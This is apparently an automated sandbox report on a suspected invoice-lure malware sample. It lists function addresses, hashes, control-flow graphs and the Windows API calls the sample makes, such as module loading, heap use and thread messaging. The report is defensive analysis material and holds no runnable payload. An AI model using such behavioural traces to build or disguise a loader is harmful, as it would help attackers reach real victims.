                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: cdc9a62171cff3098e7f5a05545d7d7d3e8e919a216bf06b821a6c47ed66197b
                                                                                                                                        • Instruction ID: 2d5ec9d0054cf0981abc51a2ed37e5f8a162fc8f0ec1071669c05206003fada7
                                                                                                                                        • Opcode Fuzzy Hash: cdc9a62171cff3098e7f5a05545d7d7d3e8e919a216bf06b821a6c47ed66197b
                                                                                                                                        • Instruction Fuzzy Hash: 2441EEB0C00719CEEB25CFA9C88478DBBB5BF49304F24819AD418AB255DB756989CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0190FE80 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 350 190fe80-190fec0 351 190fec2-190fec5 350->351 352 190fec8-190fef3 GetModuleHandleW 350->352 351->352 353 190fef5-190fefb 352->353 354 190fefc-190ff10 352->354 353->354
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0190FEE6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: 9067e903a829bb59929e49de0f22350e88bb06fd2c1431516a3ac7e391d702fd
                                                                                                                                        • Instruction ID: bd1ba26824318eb890959b4dee8a29c9328fc1cb027e7d34a4cda1af205d812b
                                                                                                                                        • Opcode Fuzzy Hash: 9067e903a829bb59929e49de0f22350e88bb06fd2c1431516a3ac7e391d702fd
                                                                                                                                        • Instruction Fuzzy Hash: 531113B6C003498FDB20CF9AD444ADEFBF4EB48310F10841AD418B7650C375A645CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0187D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 800e42d7d937f8951e0f7342578f8eabf281ea0597382c1200c6d8b79821b8a1
                                                                                                                                        • Instruction ID: 82ce3dac609880fcb79af6b539ca3a709621ad848d6c5f99ea70abd42b22afde
                                                                                                                                        • Opcode Fuzzy Hash: 800e42d7d937f8951e0f7342578f8eabf281ea0597382c1200c6d8b79821b8a1
                                                                                                                                        • Instruction Fuzzy Hash: 5F213771614204DFDB01DF98D5C0B26BBA5FF84328F24C66DD9098B252C336E547CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0187D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2afbbc0797a91dde9bdf4f6a24e5b1e36085ad3a4c58e075e8ad9c0978904854
                                                                                                                                        • Instruction ID: b00ca8b3eb4ab34becde0120ad060e154d5bb409d0c459551f4401536e09464e
                                                                                                                                        • Opcode Fuzzy Hash: 2afbbc0797a91dde9bdf4f6a24e5b1e36085ad3a4c58e075e8ad9c0978904854
                                                                                                                                        • Instruction Fuzzy Hash: F9212271604204DFCB16DF58D9C4B26BFA5EF84318F20C66DD80A8B256C33AD547CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0187D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                        • Instruction ID: 7912cb0c55922cb99894247c516513731acca7d2f5e342e5bb316293b42c038e
                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                        • Instruction Fuzzy Hash: E611BE75504280CFDB12CF54D5C4B15BF61FB44314F24C6AAD8098B656C33AD50ACB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0187D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_187d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                        • Instruction ID: 630e0163aedaca3a22d407a1e6d9cf340468ad7ae5aeee7c7a772fbaf2203c76
                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                        • Instruction Fuzzy Hash: 8B11BB75504280DFDB02CF54C5C4B15BFA2FF84324F28C6AADC498B296C33AE40ACB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0186D199 Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631069635.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_186d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 53ff37ba313fd36608441e89a2da7fb09820aea5de5c31c258d216dae8af78c1
                                                                                                                                        • Instruction ID: 82c215bc2b172ad4b44c320159346a49cda8dea6b662cf947b8551807e9e983a
                                                                                                                                        • Opcode Fuzzy Hash: 53ff37ba313fd36608441e89a2da7fb09820aea5de5c31c258d216dae8af78c1
                                                                                                                                        • Instruction Fuzzy Hash: 5801F731608744DAE7108A9ACD84767FFDCEF41324F18CA2AED498A296C2B9D940C671
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0186D198 Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631069635.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_186d000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7773a43379a6ec157509c9a10f5183c8b46a5f5320f2148fd6f2b603a3c0545e
                                                                                                                                        • Instruction ID: b9982f2a5c0218c884faa2bcda08035128acb7005025774710d66f20ff64f57e
                                                                                                                                        • Opcode Fuzzy Hash: 7773a43379a6ec157509c9a10f5183c8b46a5f5320f2148fd6f2b603a3c0545e
                                                                                                                                        • Instruction Fuzzy Hash: DAF0C2715083449AE7108A5ACC84B62FFECEF40334F18C95AED484B296C2799840CAB0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 0190BB40 Relevance: .3, Instructions: 264COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c43581cec3990119bff8f2a97f4a82d194527ccaa6083311e2e7bf1a6fd78990
                                                                                                                                        • Instruction ID: a760ae2b2825ad93aa739e2a07d77d51632a305f44b2c0d6d6d8fe49a760b9bf
                                                                                                                                        • Opcode Fuzzy Hash: c43581cec3990119bff8f2a97f4a82d194527ccaa6083311e2e7bf1a6fd78990
                                                                                                                                        • Instruction Fuzzy Hash: C4D10631D2075ADACB00EB68D954A9DF7B1FF95300F50C7AAE40977211EB706AC9CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                        Signature Coverage:7.5%
                                                                                                                                        Total number of Nodes:146
                                                                                                                                        Total number of Limit Nodes:12
                                                                                                                                        execution_graph 86242 42a863 86243 42a880 86242->86243 86246 1032df0 LdrInitializeThunk 86243->86246 86244 42a8a8 86246->86244 86247 4243e3 86252 4243f2 86247->86252 86248 424476 86249 424436 86255 42d113 86249->86255 86252->86248 86252->86249 86253 424471 86252->86253 86254 42d113 RtlFreeHeap 86253->86254 86254->86248 86258 42b5a3 86255->86258 86257 424443 86259 42b5bd 86258->86259 86260 42b5ce RtlFreeHeap 86259->86260 86260->86257 86262 424053 86263 42406f 86262->86263 86264 424097 86263->86264 86265 4240ab 86263->86265 86266 42b233 NtClose 86264->86266 86272 42b233 86265->86272 86268 4240a0 86266->86268 86269 4240b4 86275 42d233 RtlAllocateHeap 86269->86275 86271 4240bf 86273 42b250 86272->86273 86274 42b261 NtClose 86273->86274 86274->86269 86275->86271 86276 42e1f3 86277 42e203 86276->86277 86278 42e209 86276->86278 86281 42d1f3 86278->86281 86280 42e22f 86284 42b553 86281->86284 86283 42d20e 86283->86280 86285 42b570 86284->86285 86286 42b581 RtlAllocateHeap 86285->86286 86286->86283 86287 413c73 86288 413c8d 86287->86288 86293 417673 86288->86293 86290 413cab 86291 413cf0 86290->86291 86292 413cdf PostThreadMessageW 86290->86292 86292->86291 86294 417697 86293->86294 86295 4176d3 LdrLoadDll 86294->86295 86296 41769e 86294->86296 86295->86296 86296->86290 86297 41acd3 86298 41ad17 86297->86298 86299 41ad38 86298->86299 86300 42b233 NtClose 86298->86300 86300->86299 86301 41ddf3 86302 41de19 86301->86302 86306 41df07 86302->86306 86307 42e323 86302->86307 86304 41deab 86304->86306 86313 42a8b3 86304->86313 86308 42e293 86307->86308 86309 42e2f0 86308->86309 86310 42d1f3 RtlAllocateHeap 86308->86310 86309->86304 86311 42e2cd 86310->86311 86312 42d113 RtlFreeHeap 86311->86312 86312->86309 86314 42a8d0 86313->86314 86317 1032c0a 86314->86317 86315 42a8fc 86315->86306 86318 1032c11 86317->86318 86319 1032c1f LdrInitializeThunk 86317->86319 86318->86315 86319->86315 86261 1032b60 LdrInitializeThunk 86320 401ab8 86321 401ad5 86320->86321 86324 42e6b3 86321->86324 86327 42cd13 86324->86327 86328 42cd36 86327->86328 86339 407243 86328->86339 86330 42cd4c 86331 401b45 86330->86331 86342 41aae3 86330->86342 86333 42cd6b 86334 42cd80 86333->86334 86357 42b5f3 86333->86357 86353 427303 86334->86353 86337 42cd8f 86338 42b5f3 ExitProcess 86337->86338 86338->86331 86360 4163a3 86339->86360 86341 407250 86341->86330 86343 41ab0f 86342->86343 86371 41a9d3 86343->86371 86346 41ab54 86348 41ab70 86346->86348 86351 42b233 NtClose 86346->86351 86347 41ab3c 86349 41ab47 86347->86349 86350 42b233 NtClose 86347->86350 86348->86333 86349->86333 86350->86349 86352 41ab66 86351->86352 86352->86333 86354 42735d 86353->86354 86355 42736a 86354->86355 86382 4181c3 86354->86382 86355->86337 86358 42b610 86357->86358 86359 42b621 ExitProcess 86358->86359 86359->86334 86361 4163ba 86360->86361 86363 4163d3 86361->86363 86364 42bc93 86361->86364 86363->86341 86366 42bcab 86364->86366 86365 42bccf 86365->86363 86366->86365 86367 42a8b3 LdrInitializeThunk 86366->86367 86368 42bd24 86367->86368 86369 42d113 RtlFreeHeap 86368->86369 86370 42bd39 86369->86370 86370->86363 86372 41a9ed 86371->86372 86376 41aac9 86371->86376 86377 42a953 86372->86377 86375 42b233 NtClose 86375->86376 86376->86346 86376->86347 86378 42a970 86377->86378 86381 10335c0 LdrInitializeThunk 86378->86381 86379 41aabd 86379->86375 86381->86379 86384 4181ed 86382->86384 86383 41865b 86383->86355 86384->86383 86390 413da3 86384->86390 86386 4182fa 86386->86383 86387 42d113 RtlFreeHeap 86386->86387 86388 418312 86387->86388 86388->86383 86389 42b5f3 ExitProcess 86388->86389 86389->86383 86391 413dc2 86390->86391 86393 413f17 86391->86393 86395 413ee0 86391->86395 86399 4137f3 LdrInitializeThunk 86391->86399 86393->86386 86395->86393 86400 41adf3 86395->86400 86396 41adf3 3 API calls 86397 413f0d 86396->86397 86397->86386 86399->86395 86401 41ae18 86400->86401 86407 428953 86401->86407 86403 413ef4 86403->86393 86403->86396 86405 41ae3e 86405->86403 86406 42d113 RtlFreeHeap 86405->86406 86412 41ac33 LdrInitializeThunk 86405->86412 86406->86405 86408 4289b0 86407->86408 86409 4289e3 86408->86409 86413 413833 86408->86413 86409->86405 86411 4289c5 86411->86405 86412->86405 86414 413847 86413->86414 86415 4137f8 86413->86415 86414->86411 86418 42b4b3 86415->86418 86419 42b4cd 86418->86419 86422 1032c70 LdrInitializeThunk 86419->86422 86420 413815 86420->86411 86422->86420 86423 418878 86424 42b233 NtClose 86423->86424 86425 418882 86424->86425

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00417673 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                        • Instruction ID: 63ddb307992d993e20b5758824dbbb23b6c5c0d885c371cecfd37f145fc1fc2a
                                                                                                                                        • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                        • Instruction Fuzzy Hash: 48011EB5E4020DABDF10DAE5DC42FDEB7789B54308F0081AAE90897240FA35EB548B95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0042B233 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                        • Instruction ID: da727019d85e71b4f98dc3c04865d8d3d54acb7ac2c2c1eb56f854e5711b10c9
                                                                                                                                        • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                        • Instruction Fuzzy Hash: CCE04676640214BBC220AAAADC41FAB776CEFC6714F00402AFA0CA7242C6B4B90187F5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 367 1032b60-1032b6c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: e5d7bc9869750eac0ad810ee1791d7558c3234443504cb6d40120b6b52986897
                                                                                                                                        • Instruction ID: 6e9c6c13c03672dda7b1df24cb3f87ebc9c6a95a43d71a7b0b16f79d87020cee
                                                                                                                                        • Opcode Fuzzy Hash: e5d7bc9869750eac0ad810ee1791d7558c3234443504cb6d40120b6b52986897
                                                                                                                                        • Instruction Fuzzy Hash: 389002A120240003510571988454616400A97E0201B55C432E1414590DC56589A16225
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 369 1032df0-1032dfc LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: a3adc925c34c21b4e0fd3cc769cf94bd04390fdb483cb3e48b73e9aaed415ddf
                                                                                                                                        • Instruction ID: 190835e39756043219e8e71addd8cfba7a5b7fead86b87fcc3f73e158722bf2d
                                                                                                                                        • Opcode Fuzzy Hash: a3adc925c34c21b4e0fd3cc769cf94bd04390fdb483cb3e48b73e9aaed415ddf
                                                                                                                                        • Instruction Fuzzy Hash: 8590027120140413E11171988544707000997D0241F95C823A0824558DD6968A62A221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 368 1032c70-1032c7c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 0b3e56b737ebe72b91b4d6dee5ca58136e194d39c63c6105a3a5209402e2c47e
                                                                                                                                        • Instruction ID: 10c0a3d42aecd8f18333ed20d577bc7b825b92e8a8102802c0524c0169adbb87
                                                                                                                                        • Opcode Fuzzy Hash: 0b3e56b737ebe72b91b4d6dee5ca58136e194d39c63c6105a3a5209402e2c47e
                                                                                                                                        • Instruction Fuzzy Hash: C590027120148803E1107198C44474A000597D0301F59C822A4824658DC6D589A17221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 6ee89a0c374c0abfdcf0f6c44f6098f6a4b53d3fc879fba1eb126a36cecb546d
                                                                                                                                        • Instruction ID: 28074be30289506fd473c7957fe8f59822c3d5f1b28b45d17eafa746f77820f1
                                                                                                                                        • Opcode Fuzzy Hash: 6ee89a0c374c0abfdcf0f6c44f6098f6a4b53d3fc879fba1eb126a36cecb546d
                                                                                                                                        • Instruction Fuzzy Hash: D390027160550403E10071988554706100597D0201F65C822A0824568DC7D58A6166A2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00413C6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        • Opcode ID: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                                                                        • Instruction ID: 5a9376cf19c71376eb6dcd9ad07240282008403dba884ccb0a10c61fd27c35d5
                                                                                                                                        • Opcode Fuzzy Hash: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                                                                        • Instruction Fuzzy Hash: 1B114872D0415C7AEB10ABE59C82DEFBB7CDF406A8F048069FE1077141D5685F0687E5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00413C73 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: C3vB7APK$C3vB7APK
                                                                                                                                        • API String ID: 1836367815-224894077
                                                                                                                                        • Opcode ID: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                                                                        • Instruction ID: 4273e9db8a055284bf7aad7e038a2b9a4781de0a78bbed76330aa2944e199f6c
                                                                                                                                        • Opcode Fuzzy Hash: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                                                                        • Instruction Fuzzy Hash: CC0104B2D0011C7AEB10ABE59C82DEFBB7CDF40698F058069FA14B7241D5685F068BE5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0042B5A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID: !dA
                                                                                                                                        • API String ID: 3298025750-3330550368
                                                                                                                                        • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                        • Instruction ID: 28da6497efbab91fddcaddee6dcc59dcba5a5150a74096bf66e05214206e21d5
                                                                                                                                        • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                        • Instruction Fuzzy Hash: A4E06DB2640208BBD610EE99DC41EAB33ACEFCA710F000019F909A7242C670B9108AB9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0042B553 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                                                                        APIs
